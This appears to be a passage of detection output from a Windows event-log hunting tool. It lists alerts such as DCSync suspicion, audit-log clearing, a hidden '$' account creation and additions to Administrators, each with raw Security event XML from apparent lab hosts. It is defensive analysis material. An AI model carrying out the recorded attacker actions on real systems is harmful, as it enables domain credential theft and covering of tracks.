<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4720</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2020-09-16T09:32:13.647155Z"">
</TimeCreated>
<EventRecordID>769634</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""584"" ThreadID=""640"">
</Execution>
<Channel>Security</Channel>
<Computer>01566s-win16-ir.threebeesco.com</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""TargetUserName"">$</Data>
<Data Name=""TargetDomainName"">3B</Data>
<Data Name=""TargetSid"">S-1-5-21-308926384-506822093-3341789130-107104</Data>
<Data Name=""SubjectUserSid"">S-1-5-18</Data>
<Data Name=""SubjectUserName"">01566S-WIN16-IR$</Data>
<Data Name=""SubjectDomainName"">3B</Data>
<Data Name=""SubjectLogonId"">0x3e7</Data>
<Data Name=""PrivilegeList"">-</Data>
<Data Name=""SamAccountName"">$</Data>
<Data Name=""DisplayName"">%%1793</Data>
<Data Name=""UserPrincipalName"">-</Data>
<Data Name=""HomeDirectory"">%%1793</Data>
<Data Name=""HomePath"">%%1793</Data>
<Data Name=""ScriptPath"">%%1793</Data>
<Data Name=""ProfilePath"">%%1793</Data>
<Data Name=""UserWorkstations"">%%1793</Data>
<Data Name=""PasswordLastSet"">%%1794</Data>
<Data Name=""AccountExpires"">%%1794</Data>
<Data Name=""PrimaryGroupId"">513</Data>
<Data Name=""AllowedToDelegateTo"">-</Data>
<Data Name=""OldUacValue"">0x0</Data>
<Data Name=""NewUacValue"">0x15</Data>
<Data Name=""UserAccountControl"">
%%2080
%%2082
%%2084</Data>
<Data Name=""UserParameters"">%%1792</Data>
<Data Name=""SidHistory"">-</Data>
<Data Name=""LogonHours"">%%1793</Data>
</EventData>
</Event>",01566s-win16-ir.threebeesco.com,Security
User Created through management interface,1600248679.134161,2020-09-16T13:31:19.134161+04:00,,Audit,Medium,User Name ( 01566S-WIN16-IR$ ) Created User Name ( $ ),4720,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4720</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2020-09-16T09:31:19.133272Z"">
</TimeCreated>
<EventRecordID>769629</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""584"" ThreadID=""752"">
</Execution>
<Channel>Security</Channel>
<Computer>01566s-win16-ir.threebeesco.com</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""TargetUserName"">$</Data>
<Data Name=""TargetDomainName"">3B</Data>
<Data Name=""TargetSid"">S-1-5-21-308926384-506822093-3341789130-107103</Data>
<Data Name=""SubjectUserSid"">S-1-5-18</Data>
<Data Name=""SubjectUserName"">01566S-WIN16-IR$</Data>
<Data Name=""SubjectDomainName"">3B</Data>
<Data Name=""SubjectLogonId"">0x3e7</Data>
<Data Name=""PrivilegeList"">-</Data>
<Data Name=""SamAccountName"">$</Data>
<Data Name=""DisplayName"">%%1793</Data>
<Data Name=""UserPrincipalName"">-</Data>
<Data Name=""HomeDirectory"">%%1793</Data>
<Data Name=""HomePath"">%%1793</Data>
<Data Name=""ScriptPath"">%%1793</Data>
<Data Name=""ProfilePath"">%%1793</Data>
<Data Name=""UserWorkstations"">%%1793</Data>
<Data Name=""PasswordLastSet"">%%1794</Data>
<Data Name=""AccountExpires"">%%1794</Data>
<Data Name=""PrimaryGroupId"">513</Data>
<Data Name=""AllowedToDelegateTo"">-</Data>
<Data Name=""OldUacValue"">0x0</Data>
<Data Name=""NewUacValue"">0x15</Data>
<Data Name=""UserAccountControl"">
%%2080
%%2082
%%2084</Data>
<Data Name=""UserParameters"">%%1792</Data>
<Data Name=""SidHistory"">-</Data>
<Data Name=""LogonHours"">%%1793</Data>
</EventData>
</Event>",01566s-win16-ir.threebeesco.com,Security
schedule task updated,1553516620.16764,2019-03-25T16:23:40.167640+04:00,,Audit,Low,schedule task updated by user,4702,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4702</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T12:22:45.317605Z"">
</TimeCreated>
<EventRecordID>198238969</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""3616"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-20</Data>
<Data Name=""SubjectUserName"">DC1$</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x3e4</Data>
<Data Name=""TaskName"">\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</Data>
<Data Name=""TaskContentNew"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt;
&lt;Task version=&quot;1.4&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt;
&lt;RegistrationInfo&gt;
&lt;Source&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Source&gt;
&lt;Author&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Author&gt;
&lt;Version&gt;1.0&lt;/Version&gt;
&lt;Description&gt;$(@%systemroot%\system32\sppc.dll,-201)&lt;/Description&gt;
&lt;URI&gt;\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask&lt;/URI&gt;
&lt;SecurityDescriptor&gt;D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)&lt;/SecurityDescriptor&gt;
&lt;/RegistrationInfo&gt;
&lt;Triggers&gt;
&lt;CalendarTrigger&gt;
&lt;StartBoundary&gt;2019-03-26T12:21:45Z&lt;/StartBoundary&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;ScheduleByDay&gt;
&lt;DaysInterval&gt;1&lt;/DaysInterval&gt;
&lt;/ScheduleByDay&gt;
&lt;/CalendarTrigger&gt;
&lt;/Triggers&gt;
&lt;Principals&gt;
&lt;Principal id=&quot;NetworkService&quot;&gt;
&lt;UserId&gt;S-1-5-20&lt;/UserId&gt;
&lt;RunLevel&gt;LeastPrivilege&lt;/RunLevel&gt;
&lt;/Principal&gt;
&lt;/Principals&gt;
&lt;Settings&gt;
&lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt;
&lt;DisallowStartIfOnBatteries&gt;false&lt;/DisallowStartIfOnBatteries&gt;
&lt;StopIfGoingOnBatteries&gt;false&lt;/StopIfGoingOnBatteries&gt;
&lt;AllowHardTerminate&gt;false&lt;/AllowHardTerminate&gt;
&lt;StartWhenAvailable&gt;true&lt;/StartWhenAvailable&gt;
&lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt;
&lt;IdleSettings&gt;
&lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt;
&lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt;
&lt;/IdleSettings&gt;
&lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;Hidden&gt;true&lt;/Hidden&gt;
&lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt;
&lt;DisallowStartOnRemoteAppSession&gt;false&lt;/DisallowStartOnRemoteAppSession&gt;
&lt;UseUnifiedSchedulingEngine&gt;true&lt;/UseUnifiedSchedulingEngine&gt;
&lt;WakeToRun&gt;false&lt;/WakeToRun&gt;
&lt;ExecutionTimeLimit&gt;PT0S&lt;/ExecutionTimeLimit&gt;
&lt;Priority&gt;7&lt;/Priority&gt;
&lt;RestartOnFailure&gt;
&lt;Interval&gt;PT1M&lt;/Interval&gt;
&lt;Count&gt;3&lt;/Count&gt;
&lt;/RestartOnFailure&gt;
&lt;/Settings&gt;
&lt;Actions Context=&quot;NetworkService&quot;&gt;
&lt;ComHandler&gt;
&lt;ClassId&gt;{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}&lt;/ClassId&gt;
&lt;Data&gt;&lt;![CDATA[timer]]&gt;&lt;/Data&gt;
&lt;/ComHandler&gt;
&lt;/Actions&gt;
&lt;/Task&gt;</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
schedule task updated,1553514820.047682,2019-03-25T15:53:40.047682+04:00,,Audit,Low,schedule task updated by user,4702,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4702</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T11:52:45.143617Z"">
</TimeCreated>
<EventRecordID>198238774</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""4024"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-20</Data>
<Data Name=""SubjectUserName"">DC1$</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x3e4</Data>
<Data Name=""TaskName"">\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</Data>
<Data Name=""TaskContentNew"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt;
&lt;Task version=&quot;1.4&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt;
&lt;RegistrationInfo&gt;
&lt;Source&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Source&gt;
&lt;Author&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Author&gt;
&lt;Version&gt;1.0&lt;/Version&gt;
&lt;Description&gt;$(@%systemroot%\system32\sppc.dll,-201)&lt;/Description&gt;
&lt;URI&gt;\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask&lt;/URI&gt;
&lt;SecurityDescriptor&gt;D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)&lt;/SecurityDescriptor&gt;
&lt;/RegistrationInfo&gt;
&lt;Triggers&gt;
&lt;CalendarTrigger&gt;
&lt;StartBoundary&gt;2019-03-26T11:51:45Z&lt;/StartBoundary&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;ScheduleByDay&gt;
&lt;DaysInterval&gt;1&lt;/DaysInterval&gt;
&lt;/ScheduleByDay&gt;
&lt;/CalendarTrigger&gt;
&lt;/Triggers&gt;
&lt;Principals&gt;
&lt;Principal id=&quot;NetworkService&quot;&gt;
&lt;UserId&gt;S-1-5-20&lt;/UserId&gt;
&lt;RunLevel&gt;LeastPrivilege&lt;/RunLevel&gt;
&lt;/Principal&gt;
&lt;/Principals&gt;
&lt;Settings&gt;
&lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt;
&lt;DisallowStartIfOnBatteries&gt;false&lt;/DisallowStartIfOnBatteries&gt;
&lt;StopIfGoingOnBatteries&gt;false&lt;/StopIfGoingOnBatteries&gt;
&lt;AllowHardTerminate&gt;false&lt;/AllowHardTerminate&gt;
&lt;StartWhenAvailable&gt;true&lt;/StartWhenAvailable&gt;
&lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt;
&lt;IdleSettings&gt;
&lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt;
&lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt;
&lt;/IdleSettings&gt;
&lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;Hidden&gt;true&lt;/Hidden&gt;
&lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt;
&lt;DisallowStartOnRemoteAppSession&gt;false&lt;/DisallowStartOnRemoteAppSession&gt;
&lt;UseUnifiedSchedulingEngine&gt;true&lt;/UseUnifiedSchedulingEngine&gt;
&lt;WakeToRun&gt;false&lt;/WakeToRun&gt;
&lt;ExecutionTimeLimit&gt;PT0S&lt;/ExecutionTimeLimit&gt;
&lt;Priority&gt;7&lt;/Priority&gt;
&lt;RestartOnFailure&gt;
&lt;Interval&gt;PT1M&lt;/Interval&gt;
&lt;Count&gt;3&lt;/Count&gt;
&lt;/RestartOnFailure&gt;
&lt;/Settings&gt;
&lt;Actions Context=&quot;NetworkService&quot;&gt;
&lt;ComHandler&gt;
&lt;ClassId&gt;{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}&lt;/ClassId&gt;
&lt;Data&gt;&lt;![CDATA[timer]]&gt;&lt;/Data&gt;
&lt;/ComHandler&gt;
&lt;/Actions&gt;
&lt;/Task&gt;</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
schedule task updated,1553513019.936605,2019-03-25T15:23:39.936605+04:00,,Audit,Low,schedule task updated by user,4702,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4702</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T11:22:45.080609Z"">
</TimeCreated>
<EventRecordID>198238563</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2260"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-20</Data>
<Data Name=""SubjectUserName"">DC1$</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x3e4</Data>
<Data Name=""TaskName"">\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</Data>
<Data Name=""TaskContentNew"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt;
&lt;Task version=&quot;1.4&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt;
&lt;RegistrationInfo&gt;
&lt;Source&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Source&gt;
&lt;Author&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Author&gt;
&lt;Version&gt;1.0&lt;/Version&gt;
&lt;Description&gt;$(@%systemroot%\system32\sppc.dll,-201)&lt;/Description&gt;
&lt;URI&gt;\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask&lt;/URI&gt;
&lt;SecurityDescriptor&gt;D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)&lt;/SecurityDescriptor&gt;
&lt;/RegistrationInfo&gt;
&lt;Triggers&gt;
&lt;CalendarTrigger&gt;
&lt;StartBoundary&gt;2019-03-26T11:21:44Z&lt;/StartBoundary&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;ScheduleByDay&gt;
&lt;DaysInterval&gt;1&lt;/DaysInterval&gt;
&lt;/ScheduleByDay&gt;
&lt;/CalendarTrigger&gt;
&lt;/Triggers&gt;
&lt;Principals&gt;
&lt;Principal id=&quot;NetworkService&quot;&gt;
&lt;UserId&gt;S-1-5-20&lt;/UserId&gt;
&lt;RunLevel&gt;LeastPrivilege&lt;/RunLevel&gt;
&lt;/Principal&gt;
&lt;/Principals&gt;
&lt;Settings&gt;
&lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt;
&lt;DisallowStartIfOnBatteries&gt;false&lt;/DisallowStartIfOnBatteries&gt;
&lt;StopIfGoingOnBatteries&gt;false&lt;/StopIfGoingOnBatteries&gt;
&lt;AllowHardTerminate&gt;false&lt;/AllowHardTerminate&gt;
&lt;StartWhenAvailable&gt;true&lt;/StartWhenAvailable&gt;
&lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt;
&lt;IdleSettings&gt;
&lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt;
&lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt;
&lt;/IdleSettings&gt;
&lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;Hidden&gt;true&lt;/Hidden&gt;
&lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt;
&lt;DisallowStartOnRemoteAppSession&gt;false&lt;/DisallowStartOnRemoteAppSession&gt;
&lt;UseUnifiedSchedulingEngine&gt;true&lt;/UseUnifiedSchedulingEngine&gt;
&lt;WakeToRun&gt;false&lt;/WakeToRun&gt;
&lt;ExecutionTimeLimit&gt;PT0S&lt;/ExecutionTimeLimit&gt;
&lt;Priority&gt;7&lt;/Priority&gt;
&lt;RestartOnFailure&gt;
&lt;Interval&gt;PT1M&lt;/Interval&gt;
&lt;Count&gt;3&lt;/Count&gt;
&lt;/RestartOnFailure&gt;
&lt;/Settings&gt;
&lt;Actions Context=&quot;NetworkService&quot;&gt;
&lt;ComHandler&gt;
&lt;ClassId&gt;{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}&lt;/ClassId&gt;
&lt;Data&gt;&lt;![CDATA[timer]]&gt;&lt;/Data&gt;
&lt;/ComHandler&gt;
&lt;/Actions&gt;
&lt;/Task&gt;</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Audit log cleared,1600879816.697344,2020-09-23T20:50:16.697344+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2020-09-23T16:49:41.578692Z"">
</TimeCreated>
<EventRecordID>772605</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5424"" ThreadID=""5816"">
</Execution>
<Channel>Security</Channel>
<Computer>01566s-win16-ir.threebeesco.com</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-500</SubjectUserSid>
<SubjectUserName>Administrator</SubjectUserName>
<SubjectDomainName>3B</SubjectDomainName>
<SubjectLogonId>0x7b186</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",01566s-win16-ir.threebeesco.com,Security
User added to local group,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,User ( IEUser ) added User ( S-1-5-20 ) to local group ( Administrators ),4732,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4732</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13826</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-09-22T11:23:19.251925Z"">
</TimeCreated>
<EventRecordID>191030</EventRecordID>
<Correlation ActivityID=""15957A0B-7182-0000-A07A-95158271D501"">
</Correlation>
<Execution ProcessID=""624"" ThreadID=""5108"">
</Execution>
<Channel>Security</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""MemberName"">-</Data>
<Data Name=""MemberSid"">S-1-5-20</Data>
<Data Name=""TargetUserName"">Administrators</Data>
<Data Name=""TargetDomainName"">Builtin</Data>
<Data Name=""TargetSid"">S-1-5-32-544</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
<Data Name=""SubjectUserName"">IEUser</Data>
<Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
<Data Name=""SubjectLogonId"">0x27a10f</Data>
<Data Name=""PrivilegeList"">-</Data>
</EventData>
</Event>",MSEDGEWIN10,Security
User added to local group,1569151399.251925,2019-09-22T15:23:19.251925+04:00,,Audit,High,User ( IEUser ) added User ( S-1-5-21-3461203602-4096304019-2269080069-501 ) to local group ( Administrators ),4732,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4732</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13826</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-09-22T11:22:05.201727Z"">
</TimeCreated>
<EventRecordID>191029</EventRecordID>
<Correlation ActivityID=""15957A0B-7182-0000-A07A-95158271D501"">
</Correlation>
<Execution ProcessID=""624"" ThreadID=""4452"">
</Execution>
<Channel>Security</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""MemberName"">-</Data>
<Data Name=""MemberSid"">S-1-5-21-3461203602-4096304019-2269080069-501</Data>
<Data Name=""TargetUserName"">Administrators</Data>
<Data Name=""TargetDomainName"">Builtin</Data>
<Data Name=""TargetSid"">S-1-5-32-544</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
<Data Name=""SubjectUserName"">IEUser</Data>
<Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
<Data Name=""SubjectLogonId"">0x27a10f</Data>
<Data Name=""PrivilegeList"">-</Data>
</EventData>
</Event>",MSEDGEWIN10,Security
Dcsync Attack detected,1557284437.586173,2019-05-08T07:00:37.586173+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4662</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14080</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-08T03:00:37.583261Z"">
</TimeCreated>
<EventRecordID>203056</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""4980"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-500</Data>
<Data Name=""SubjectUserName"">Administrator</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x418a6fb</Data>
<Data Name=""ObjectServer"">DS</Data>
<Data Name=""ObjectType"">%{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
<Data Name=""ObjectName"">%{c6faf700-bfe4-452a-a766-424f84c29583}</Data>
<Data Name=""OperationType"">Object Access</Data>
<Data Name=""HandleId"">0x0</Data>
<Data Name=""AccessList"">%%7688
</Data>
<Data Name=""AccessMask"">0x100</Data>
<Data Name=""Properties"">%%7688
{9923a32a-3607-11d2-b9be-0000f87a36b2}
{19195a5b-6da0-11d0-afd3-00c04fd930c9}
</Data>
<Data Name=""AdditionalInfo"">-</Data>
<Data Name=""AdditionalInfo2""></Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Audit log cleared,1557284425.304206,2019-05-08T07:00:25.304206+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-08T03:00:11.778188Z"">
</TimeCreated>
<EventRecordID>203050</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""744"" ThreadID=""768"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-738609754-2819869699-4189121830-500</SubjectUserSid>
<SubjectUserName>administrator</SubjectUserName>
<SubjectDomainName>insecurebank</SubjectDomainName>
<SubjectLogonId>0x218b896</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.024634Z"">
</TimeCreated>
<EventRecordID>198242594</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""3300"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">AF3067E0-BB6F-47C2-AA20-F3F458797F38</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-41891218